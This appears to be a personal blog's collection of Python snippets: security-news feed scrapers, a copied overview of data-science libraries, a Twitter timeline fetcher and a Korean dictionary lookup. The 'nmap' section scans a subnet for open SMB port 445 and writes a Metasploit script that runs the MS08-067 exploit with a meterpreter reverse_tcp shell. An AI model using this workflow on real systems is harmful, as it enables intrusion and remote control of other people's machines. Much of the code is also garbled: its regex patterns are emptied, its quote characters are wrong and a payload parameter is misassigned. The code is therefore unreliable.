Python to gather news postings

#coded by sk for me.
# -*- coding: utf-8 -*-
import re
import requests
import numpy

url = ‘http://www.krcert.or.kr/data/secNoticeList.do’
recvd = requests.get(url)

print ‘#’*50
print ‘KISA’ + ‘#’*20
tbody = re.findall(r’

.+?

‘, recvd.text, re.DOTALL)
for line in tbody:
# print line
temp = re.findall(r’(.+?)‘,line)
temp_date = re.findall(r’2016.[1-9][0-9].[1-9][0-9]’,line)
try:
for i in range(0, 20, 1):
print temp[i],temp_date[i]
A = ((temp[i], temp_date[i]))

except:
print ‘done’
# for line2 in temp:
# temp_date = re.findall(r’2016.[1-9][0-9].[1-9][0-9]’,line)
# print temp_date
# for line3 in temp_date:
# print line2
# for line2 in temp:
# temp2 = re.findall(r’

2016.[0-9][0-9].[0-9][0-9]

‘, temp)
# print line2
print ‘#’*30
print ‘USCert’ + ‘#’*20
url = ‘https://www.us-cert.gov/ncas/current-activity.xml’
recvd = requests.get(url)
tbody = re.findall(r’.+?’, recvd.text, re.DOTALL)
for line in tbody:
# print line
temp_date = re.findall(r'(.+?)’,line)
temp = re.findall(r'(.+?)’,line)
print temp[0],temp_date[0]
# temp_date = re.findall(r’2016.[1-9][0-9].[1-9][0-9]’,line)
print ‘#’*30
print ‘Krebs’ + ‘#’*20
url = ‘https://krebsonsecurity.com/feed/’
recvd = requests.get(url)
tbody = re.findall(r’.+?’, recvd.text, re.DOTALL)
for line in tbody:
# print line
temp_date = re.findall(r'(.+?)’,line)
temp = re.findall(r'(.+?)’,line)
print temp[0],temp_date[0]

print ‘#’*50
print ‘KB-UScert’ + ‘#’*20
url = ‘https://www.kb.cert.org/vulfeed’
recvd = requests.get(url)
tbody = re.findall(r’.+?’, recvd.text, re.DOTALL)
#print tbody
for line in tbody:
# print line
temp = re.findall(r'(.+?)’,line)
temp_date = re.findall(r'(.+?)’,line)
print temp[0],temp_date[0]

print ‘#’*30
print ‘USCert Alert’ + ‘#’*20
url = ‘https://www.us-cert.gov/ncas/alerts.xml’
recvd = requests.get(url)
tbody = re.findall(r’.+?’, recvd.text, re.DOTALL)
for line in tbody:
# print line
temp_date = re.findall(r'(.+?)’,line)
temp = re.findall(r'(.+?)’,line)
print temp[0],temp_date[0]

print ‘#’*30

Reference – 15-python-libraries-data-science

http://ggplot.yhathq.com/

 

 

https://www.upwork.com/hiring/data/15-python-libraries-data-science/

BASIC LIBRARIES FOR DATA SCIENCE

These are the basic libraries that transform Python from a general purpose programming language into a powerful and robust tool for data analysis and visualization. Sometimes called the SciPy Stack, they’re the foundation that the more specialized tools are built on.

  1. NumPy is the foundational library for scientific computing in Python, and many of the libraries on this list use NumPy arrays as their basic inputs and outputs. In short, NumPy introduces objects for multidimensional arrays and matrices, as well as routines that allow developers to perform advanced mathematical and statistical functions on those arrays with as little code as possible.
  2. SciPy builds on NumPy by adding a collection of algorithms and high-level commands for manipulating and visualizing data. This package includes functions for computing integrals numerically, solving differential equations, optimization, and more.
  3. Pandas adds data structures and tools that are designed for practical data analysis in finance, statistics, social sciences, and engineering. Pandas works well with incomplete, messy, and unlabeled data (i.e., the kind of data you’re likely to encounter in the real world), and provides tools for shaping, merging, reshaping, and slicing datasets.
  4. IPython extends the functionality of Python’s interactive interpreter with a souped-up interactive shell that adds introspection, rich media, shell syntax, tab completion, and command history retrieval. It also acts as an embeddable interpreter for your programs that can be really useful for debugging. If you’ve ever used Mathematica or MATLAB, you should feel comfortable with IPython.
  5. matplotlib is the standard Python library for creating 2D plots and graphs. It’s pretty low-level, meaning it requires more commands to generate nice-looking graphs and figures than with some more advanced libraries. However, the flip side of that is flexibility. With enough commands, you can make just about any kind of graph you want with matplotlib.

LIBRARIES FOR MACHINE LEARNING

Machine learning sits at the intersection of Artificial Intelligence and statistical analysis. By training computers with sets of real-world data, we’re able to create algorithms that make more accurate and sophisticated predictions, whether we’re talking about getting better driving directions or building computers that can identify landmarks just from looking at pictures. The following libraries give Python the ability to tackle a number of machine learning tasks, from performing basic regressions to training complex neural networks.

  1. scikit-learn builds on NumPy and SciPy by adding a set of algorithms for common machine learning and data mining tasks, including clustering, regression, and classification. As a library, scikit-learn has a lot going for it. Its tools are well-documented and its contributors include many machine learning experts. What’s more, it’s a very curated library, meaning developers won’t have to choose between different versions of the same algorithm. Its power and ease of use make it popular with a lot of data-heavy startups, including Evernote, OKCupid, Spotify, and Birchbox.
  2. Theano uses NumPy-like syntax to optimize and evaluate mathematical expressions. What sets Theano apart is that it takes advantage of the computer’s GPU in order to make data-intensive calculations up to 100x faster than the CPU alone. Theano’s speed makes it especially valuable for deep learning and other computationally complex tasks.
  3. TensorFlow is another high-profile entrant into machine learning, developed by Google as an open-source successor to DistBelief, their previous framework for training neural networks. TensorFlow uses a system of multi-layered nodes that allow you to quickly set up, train, and deploy artificial neural networks with large datasets. It’s what allows Google to identify objects in photos or understand spoken words in its voice-recognition app.

LIBRARIES FOR DATA MINING AND NATURAL LANGUAGE PROCESSING

What if your business doesn’t have the luxury of accessing massive datasets? For many businesses, the data they need isn’t something that can be passively gathered—it has to be extracted either from documents or webpages. The following tools are designed for a variety of related tasks, from mining valuable information from websites to turning natural language into data you can use.

  1. Scrapy is an aptly named library for creating spider bots to systematically crawl the web and extract structured data like prices, contact info, and URLs. Originally designed for web scraping, Scrapy can also extract data from APIs.
  2. NLTK is a set of libraries designed for Natural Language Processing (NLP). NLTK’s basic functions allow you to tag text, identify named entities, and display parse trees, which are like sentence diagrams that reveal parts of speech and dependencies. From there, you can do more complicated things like sentiment analysis and automatic summarization. It also comes with an entire book’s worth of material about analyzing text with NLTK.
  3. Pattern combines the functionality of Scrapy and NLTK in a massive library designed to serve as an out-of-the-box solution for web mining, NLP, machine learning, and network analysis. Its tools include a web crawler; APIs for Google, Twitter, and Wikipedia; and text-analysis algorithms like parse trees and sentiment analysis that can be performed with just a few lines of code.

LIBRARIES FOR PLOTTING AND VISUALIZATIONS

The best and most sophisticated analysis is meaningless if you can’t communicate it to other people. These libraries build on matplotlib to enable you to easily create more visually compelling and sophisticated graphs, charts, and maps, no matter what kind of analysis you’re trying to do.

  1. Seaborn is a popular visualization library that builds on matplotlib’s foundation. The first thing you’ll notice about Seaborn is that its default styles are much more sophisticated than matplotlib’s. Beyond that, Seaborn is a higher-level library, meaning it’s easier to generate certain kinds of plots, including heat maps, time series, and violin plots.
  2. Bokeh makes interactive, zoomable plots in modern web browsers using JavaScript widgets. Another nice feature of Bokeh is that it comes with three levels of interface, from high-level abstractions that allow you to quickly generate complex plots, to a low-level view that offers maximum flexibility to app developers.
  3. Basemap adds support for simple maps to matplotlib by taking matplotlib’s coordinates and applying them to more than 25 different projections. The library Folium further builds on Basemap and allows for the creation of interactive web maps, similar to the JavaScript widgets created by Bokeh.
  4. NetworkX allows you to create and analyze graphs and networks. It’s designed to work with both standard and nonstandard data formats, which makes it especially efficient and scalable. All this makes NetworkX especially well suited to analyzing complex social networks.

These libraries are just a small sample of the tools available to Python developers. If you’re ready to get your data science initiative up and running, you’re going to need the right team. Find a developer who knows the tools and techniques of statistical analysis, or a data scientist with the development skills to work in a production environment. Explore data scientists on Upwork, or learn more about the basics of Big Data.

Twitter List gathering for me

import tweepy
from tweepy import OAuthHandler

API_KEY = ”
API_SECRET = ”
ACCESS_KEY = ”
ACCESS_SECRET = ”

oAuth = tweepy.OAuthHandler(API_KEY, API_SECRET)
oAuth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
api = tweepy.API(auth_handler = oAuth, api_root = ‘/1.1’)

if __name__ == “__main__”:
userID = ‘xxxxxxx’
user = api.get_user(userID)
timeline = api.user_timeline(userID, count=400)

# PRINT USER’S TIMELINE TWEETS
for tweet in timeline:
try:
texts = tweet.text
print(texts)
except AttributeError as e:
print(e)

# PRINT USER’S FRIENDS IDs
for friend in user.friends(count = 200):
print(friend.id)

Python 2 bytes character for URL

I struggled with 2bytes character python :-0 urllib2.quote(word.encode(‘UTF-8′))) might help for URL thing.

 

#-*- coding: utf-8 -*-

from bs4 import BeautifulSoup
import urllib2

temp = raw_input(“what do you want to search? :::”)
word = unicode(temp,’utf-8’)
try:
url =urllib2.urlopen(“http://m.endic.naver.com/search.nhn?searchOption=entryIdiom&query=”+ urllib2.quote(word.encode(‘UTF-8′)))
soup = BeautifulSoup(url,”html.parser”,from_encoding=’utf-8’)
target = soup.find_all(‘p’, attrs={‘class’:’desc’})

nmap

import nmap
def findTgts(subNet):
nmScan = nmap.PortScanner()
nmScan.scan(subNet, ‘445’)
tgtHost = []
for host in nmScan.all_hosts():
if nmScan[host].has_tcp(445):
state = nmScan[host][‘tcp’][445][‘state’]
# string ‘tcp’ must be Small. Not ‘TCP’!!!!
print state
if state == ‘open’:
print ‘ Found Target Hosts’ + host
tgtHost.append(host)
return tgtHost

findTgts(‘10.46.145.210-240’)
def setuphandler(configFile, lhost, lport):
configFile.write(‘use exploit/multi/handler\n’)
configFile.write(‘set PAYLOAD ‘ + ‘windows/meterpreter/reverse_tcp\n’)
configFile.write(‘set LPORT ‘+ str(lport)+ ‘\n’)
configFile.write(‘set LHOST ‘+ lhost + ‘\n’)
configFile.write(‘exploit -j -z\n’)
configFile.write(‘set DisablePayloadHandler 1\n’)

def confickerExploit(configFile, tgtHost, lhost, lport):
configFile.write(‘use exploit/windows/smb/ms08_067_netapi\n’)
configFile.write(‘set PAYLOAD ‘ + str(tgtHost) + ‘\n’)
configFile.write(‘set LPORT ‘+ str(lport)+ ‘\n’)
configFile.write(‘set LHOST ‘+ lhost + ‘\n’)
configFile.write(‘exploit -j -z\n’)

Python krcert page posting info script

# -*- coding: utf-8 -*-
import re
import requests
url = ‘http://www.krcert.or.kr/data/secNoticeList.do’
recvd = requests.get(url)
tbody = re.findall(r'<tbody>.+?</tbody>’, recvd.text, re.DOTALL)
for line in tbody:
# print line
temp = re.findall(r'<a href=”/data/secNoticeView\.do\?bulletin_writing_sequence=[0-9][0-9][0-9][0-9][0-9]\”>(.+?)</a>’,line)
temp_date = re.findall(r’2016.[1-9][0-9].[1-9][0-9]’,line)
try:
for i in range(0, 20, 1):
print temp[i],temp_date[i]

except:
print ‘done’